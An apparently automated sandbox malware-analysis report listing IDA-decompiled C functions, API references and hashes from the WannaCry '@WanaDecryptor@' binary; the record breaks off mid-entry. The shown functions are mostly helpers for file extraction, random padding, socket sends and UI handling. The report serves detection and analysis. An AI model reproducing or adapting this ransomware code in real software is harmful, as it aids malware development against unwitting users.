String ID: f.wnry
API String ID: 1432627528-2448388194
Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796

Uniqueness

Uniqueness Score: -1.00%

Function 0040B6A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
				char _v520;
				void _v816;
				struct _SECURITY_ATTRIBUTES* _v820;
				void* _t15;
				struct _SECURITY_ATTRIBUTES* _t37;
				CHAR* _t38;
				void* _t39;
				CHAR* _t40;
				struct _SECURITY_ATTRIBUTES** _t42;
				struct _SECURITY_ATTRIBUTES** _t44;

				_t40 = _a4;
				CreateDirectoryA(_t40, 0);
				_t38 = _a8;
				_t15 = E00412920(_t38, _a12);
				_t28 = _t15;
				_t42 =  &(( &_v820)[2]);
				if(_t15 != 0) {
					_v820 = 0;
					memset( &_v816, 0, 0x4a << 2);
					E00412940(_t28, 0xffffffff,  &_v820);
					_t37 = _v820;
					_t44 =  &(_t42[6]);
					if(_t37 > 0) {
						_t39 = 0;
						if(_t37 > 0) {
							do {
								E00412940(_t28, _t39,  &_v820);
								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
								E004129E0(_t28, _t39,  &_v520);
								_t44 =  &(_t44[0xa]);
								_t39 = _t39 + 1;
							} while (_t39 < _t37);
						}
						E00412A00(_t28);
						return 1;
					} else {
						return 0;
					}
				} else {
					DeleteFileA(_t38);
					return 0;
				}
			}

APIs

CreateDirectoryA.KERNEL32(?,00000000,?,757F3310,00000000,00000428), ref: 0040B6B4
DeleteFileA.KERNEL32(?), ref: 0040B6D9

Strings

%s\%s, xrefs: 0040B748

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: CreateDeleteDirectoryFile
String ID: %s\%s
API String ID: 3195586388-4073750446
Opcode ID: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
Instruction ID: 62764616b0dad41b6f02366a4e891bd604a257d4ac44bdf0c04ae484a2ff6343
Opcode Fuzzy Hash: 9867dcfa113bb228f6e7ce7fcc7c959ecb5fe08f48f21d4d20f526cefea80cd3
Instruction Fuzzy Hash: 2F2108B620435067D620AB65EC81AEB779CEBC4324F44082EFD1892242E77D661D82FA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D150 Relevance: 6.1, APIs: 4, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040D150(int __eax, intOrPtr* __ecx, void* __edi, char _a4, char _a8, char _a12, intOrPtr* _a16) {
				char _v500;
				intOrPtr _v508;
				char _v520;
				char _v521;
				char _v528;
				char _v529;
				intOrPtr _v536;
				signed int _t42;
				short _t46;
				signed int _t48;
				int _t62;
				intOrPtr* _t63;
				intOrPtr _t67;
				intOrPtr _t81;
				void* _t82;
				void* _t83;
				void* _t89;
				void* _t94;
				intOrPtr* _t95;
				void* _t97;
				void* _t99;

				_t89 = __edi;
				_t63 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t99 =  &_v508 + 8;
				_t42 = rand();
				asm("cdq");
				_t94 = 0;
				_t81 = _t42 % 0xc8 + 0x1f;
				_v508 = _t81;
				if(_t81 > 0) {
					do {
						_t62 = rand();
						_t81 = _v508;
						 *(_t99 + _t94 + 0x14) = _t62;
						_t94 = _t94 + 1;
					} while (_t94 < _t81);
				}
				_t95 = _a16;
				_t97 = _t99 + _t81 - 0xb;
				if(_t95 != 0) {
					_push(_t89);
					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
					_t99 = _t99 + 0xc;
					asm("movsw");
					asm("movsb");
					_t81 = _v508;
					_t95 = _a16;
				}
				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
				_t82 = _t81 + 1;
				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
				_t83 = _t82 + 1;
				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
				_v508 = _t83 + 1;
				_t46 = E00412B00(_t97, 0x1f);
				_t67 = _v508;
				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
				if(_t48 < 0) {
					L12:
					return _t48 | 0xffffffff;
				} else {
					E0040D5A0(_t63, _t97);
					_push( &_v528);
					_push( &_v520);
					_push( &_v521);
					_v528 = 0x1f4;
					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
						goto L12;
					} else {
						if(_t95 == 0) {
							L10:
							return 0;
						} else {
							_push(1);
							_push(_v536);
							_push( &_v528);
							_push(2);
							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
								goto L10;
							} else {
								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
							}
						}
					}
				}
			}

APIs

time.MSVCRT ref: 0040D15D
srand.MSVCRT ref: 0040D163
rand.MSVCRT ref: 0040D16B
rand.MSVCRT ref: 0040D185

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: rand$srandtime
String ID:
API String ID: 1946231456-0
Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3

Uniqueness

Uniqueness Score: -1.00%

Function 004108A0 Relevance: 6.1, APIs: 4, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
				long _t28;
				signed int _t38;
				void* _t44;
				long* _t45;
				long _t46;
				char _t47;

				_t47 = _a12;
				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
					_t45 = _a16;
					_t44 = 0;
					_t38 = 0;
					 *_t45 = 0;
					_a12 = 0;
					if(_t47 == 1) {
						_t44 = _a4;
						_a12 = 0;
						goto L10;
					} else {
						if(_t47 != 2) {
							L11:
							_push(0x20);
							L00412CEC();
							_t46 = _t28;
							if(_t47 == 1 || _t47 == 2) {
								 *_t46 = 1;
								 *((char*)(_t46 + 0x10)) = _a12;
								 *(_t46 + 1) = _t38;
								 *(_t46 + 4) = _t44;
								 *((char*)(_t46 + 8)) = 0;
								 *(_t46 + 0xc) = 0;
								if(_t38 != 0) {
									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
								}
								 *_a16 = 0;
								return _t46;
							} else {
								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
								 *_t46 = 0;
								 *(_t46 + 1) = 1;
								 *((char*)(_t46 + 0x10)) = 0;
								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
								 *(_t46 + 0xc) = 0;
								 *_a16 = 0;
								return _t46;
							}
						} else {
							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
							if(_t44 != 0xffffffff) {
								_a12 = 1;
								L10:
								_t28 = SetFilePointer(_t44, 0, 0, 1);
								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
								goto L11;
							} else {
								 *_t45 = 0x200;
								return 0;
							}
						}
					}
				} else {
					 *_a16 = 0x10000;
					return 0;
				}
			}

0x004108a2
0x004108ab
0x004108c8
0x004108cc
0x004108ce
0x004108d3
0x004108d9
0x004108dd
0x00410915
0x00410919
0x00000000
0x004108df
0x004108e2
0x00410938
0x00410938
0x0041093a
0x00410945
0x00410947
0x00410980
0x00410985
0x00410988
0x0041098b
0x0041098e
0x00410992
0x00410999
0x004109a8
0x004109a8
0x004109b4
0x004109bb
0x0041094e
0x00410956
0x0041095d
0x00410962
0x00410965
0x00410969
0x0041096d
0x00410970
0x00410973
0x0041097b
0x0041097b
0x004108e4
0x00410901
0x00410906
0x00410920
0x00410925
0x0041092c
0x00410935
0x00000000
0x00410908
0x00410908
0x00410914
0x00410914
0x00410906
0x004108e2
0x004108b7
0x004108be
0x004108c7
0x004108c7

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
#823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$Pointer$#823Create
String ID:
API String ID: 3407337251-0
Opcode ID: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
Opcode Fuzzy Hash: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00412250 Relevance: 6.1, APIs: 4, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00412250(CHAR* _a4, void* _a8) {
				void _v260;
				char _v520;
				long _t16;
				void* _t17;
				void* _t29;
				CHAR* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;
				signed int _t47;
				signed int _t51;
				signed int _t52;
				void* _t56;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t87;
				char* _t88;
				char* _t93;

				_t88 =  &_v520;
				_t32 = _a4;
				if(_t32 != 0) {
					_t16 = GetFileAttributesA(_t32);
					if(_t16 == 0xffffffff) {
						_t16 = CreateDirectoryA(_t32, 0);
					}
				}
				_t87 = _a8;
				_t34 =  *_t87;
				if(_t34 == 0) {
					L15:
					return _t16;
				} else {
					_t17 = _t87;
					_t56 = _t87;
					do {
						if(_t34 == 0x2f || _t34 == 0x5c) {
							_t17 = _t56;
						}
						_t34 =  *(_t56 + 1);
						_t56 = _t56 + 1;
					} while (_t34 != 0);
					if(_t17 != _t87) {
						_t86 = _t87;
						_t51 = _t17 - _t87;
						_t52 = _t51 >> 2;
						memcpy( &_v260, _t86, _t52 << 2);
						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
						_t93 =  &(_t88[0x18]);
						_t34 = 0;
						_t93[_t29 + 0x114] = 0;
						E00412250(_t32,  &_v260);
						_t88 =  &(_t93[8]);
					}
					_v520 = 0;
					if(_t32 != 0) {
						asm("repne scasb");
						_t46 =  !(_t34 | 0xffffffff);
						_t85 = _t32 - _t46;
						_t47 = _t46 >> 2;
						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
						_t88 =  &(_t88[0x18]);
						_t34 = 0;
					}
					asm("repne scasb");
					_t36 =  !(_t34 | 0xffffffff);
					_t83 = _t87 - _t36;
					_t33 = _t36;
					asm("repne scasb");
					_t39 = _t33 >> 2;
					memcpy( &_v520 - 1, _t83, _t39 << 2);
					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
					_t16 = GetFileAttributesA( &_v520);
					if(_t16 != 0xffffffff) {
						goto L15;
					} else {
						return CreateDirectoryA( &_v520, 0);
					}
				}
			}

APIs

GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
GetFileAttributesA.KERNEL32(00000000), ref: 00412338
CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299

Uniqueness

Uniqueness Score: -1.00%

Function 00406A00 Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
				void* _t15;
				signed int _t23;
				intOrPtr* _t33;
				void* _t34;

				_t23 = _a12;
				_t33 = _a4;
				_push(_t23);
				_push(_a8);
				_t34 = __ecx;
				_push(_t33);
				L00412D6A();
				if(_t23 > 6) {
					L12:
					return _t15;
				} else {
					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
						case 0:
							_push( *((intOrPtr*)(__ecx + 0x824)));
							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
							L00412D64();
							if(_t17 == 0x402) {
								L6:
								_push(0xe0e0);
								 *((intOrPtr*)( *_t33 + 0x38))();
							} else {
								L00412D64();
								if(_t17 == 0x3fe) {
									goto L6;
								} else {
									L00412D64();
									if(_t17 == 0x3fb) {
										goto L6;
									} else {
										_push(0xffffff);
										 *((intOrPtr*)( *_t33 + 0x38))();
									}
								}
							}
							_t35 =  *((intOrPtr*)(_t34 + 0x828));
							if(_t35 != 0) {
								goto L11;
							}
							return 0;
							goto L13;
						case 1:
							goto L12;
						case 2:
							_push( *((intOrPtr*)(__esi + 0x824)));
							__ecx = __edi;
							 *((intOrPtr*)( *__edi + 0x34))();
							if(__esi != 0) {
								L11:
								return  *((intOrPtr*)(_t35 + 4));
							}
							return 0;
							goto L13;
					}
				}
				L13:
			}

APIs

#4476.MFC42(?,?,?), ref: 00406A15
#3089.MFC42 ref: 00406A3A
#3089.MFC42 ref: 00406A48
#3089.MFC42 ref: 00406A56

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #3089$#4476
String ID:
API String ID: 2870283385-0
Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D0A0 Relevance: 6.1, APIs: 4, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
				char _v500;
				signed int _t22;
				signed int _t27;
				intOrPtr* _t32;
				void* _t40;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;

				_t32 = __ecx;
				_push(0);
				L0041303E();
				srand(__eax);
				_t49 =  &_v500 + 8;
				_t22 = rand();
				asm("cdq");
				_t40 = 0;
				_t43 = _t22 % 0xc8 + 0x1f;
				if(_t43 <= 0) {
					L2:
					_t41 = _t49 + _t43 - 0x13;
					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
					_t44 = _t43 + 1;
					 *((char*)(_t49 + _t44 + 0x14)) = 0;
					_t45 = _t44 + 1;
					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
					_t46 = _t45 + 1;
					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
					if(_t27 >= 0) {
						E0040D5A0(_t32, _t41);
						return 0;
					} else {
						return _t27 | 0xffffffff;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *((char*)(_t49 + _t40 + 0xc)) = rand();
					_t40 = _t40 + 1;
				} while (_t40 < _t43);
				goto L2;
			}

APIs

time.MSVCRT ref: 0040D0AD
srand.MSVCRT ref: 0040D0B3
rand.MSVCRT ref: 0040D0BB
rand.MSVCRT ref: 0040D0D3

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: rand$srandtime
String ID:
API String ID: 1946231456-0
Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7

Uniqueness

Uniqueness Score: -1.00%

Function 00405180 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00405180(void* __ecx, intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t19;
				void* _t26;

				_t19 = _a4;
				_t26 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x44));
				__imp___mbscmp(_t10, _t19);
				if(_t10 == 0) {
					return _t10;
				} else {
					_push(_t19);
					L00412DA0();
					 *((char*)(__ecx + 0x48)) = 1;
					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
						E00405800(__ecx, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
						E00405820(_t26, 0);
					}
					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
						return InvalidateRect( *(_t26 + 0x20), 0, 1);
					}
					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
				}
			}

APIs

_mbscmp.MSVCRT ref: 00405191
#860.MFC42(?), ref: 004051A1
RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #860InvalidateRectRedrawWindow_mbscmp
String ID:
API String ID: 497622568-0
Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00412A00 Relevance: 6.0, APIs: 4, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00412A00(intOrPtr* _a4) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;

				_t14 = _a4;
				if(_t14 != 0) {
					if( *_t14 == 1) {
						_t2 = _t14 + 4; // 0x5d5e5f01
						_t16 =  *_t2;
						 *0x4220dc = E004127A0(_t16);
						if(_t16 != 0) {
							_t9 =  *((intOrPtr*)(_t16 + 0x138));
							if(_t9 != 0) {
								_push(_t9);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
							 *((intOrPtr*)(_t16 + 0x138)) = 0;
							if(_t10 != 0) {
								_push(_t10);
								L00412C98();
								_t18 = _t18 + 4;
							}
							_push(_t16);
							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
							L00412C98();
							_t18 = _t18 + 4;
						}
						_push(_t14);
						L00412C98();
						return  *0x4220dc;
					} else {
						 *0x4220dc = 0x80000;
						return 0x80000;
					}
				} else {
					 *0x4220dc = 0x10000;
					return 0x10000;
				}
			}

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
Opcode Fuzzy Hash: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAD0 Relevance: 6.0, APIs: 4, Instructions: 45networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 0040DB05
send.WS2_32(?,?,00000001,00000000), ref: 0040DB17
shutdown.WS2_32(?,00000002), ref: 0040DB23
closesocket.WS2_32(?), ref: 0040DB2D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: closesocketsendsetsockoptshutdown
String ID:
API String ID: 4063721217-0
Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795

Uniqueness

Uniqueness Score: -1.00%

Function 00404430 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404430(intOrPtr __ecx, char _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				struct HICON__* _t16;
				struct HICON__* _t17;
				intOrPtr _t26;

				_t26 = __ecx;
				_t13 =  *((intOrPtr*)(__ecx + 0x59));
				if(_t13 != 0) {
					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
						E00404530(__ecx);
					}
					if(E004045E0(_t26,  &_a8) == 0) {
						_t16 =  *(_t26 + 0x60);
					} else {
						_t16 =  *(_t26 + 0x5c);
					}
					_t17 = SetCursor(_t16);
					L00412CBC();
					return _t17;
				} else {
					_v16 = 0x10;
					if(__ecx != 0) {
						_t13 =  *((intOrPtr*)(__ecx + 0x20));
						_v8 = _t13;
					} else {
						_v8 = __ecx;
					}
					_v12 = 2;
					__imp___TrackMouseEvent( &_v16);
					 *((char*)(_t26 + 0x59)) = 1;
					L00412CBC();
					return _t13;
				}
			}

APIs

_TrackMouseEvent.COMCTL32(00000010), ref: 00404463
#2379.MFC42 ref: 0040446F
SetCursor.USER32(?,?), ref: 004044A2
#2379.MFC42 ref: 004044AA

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
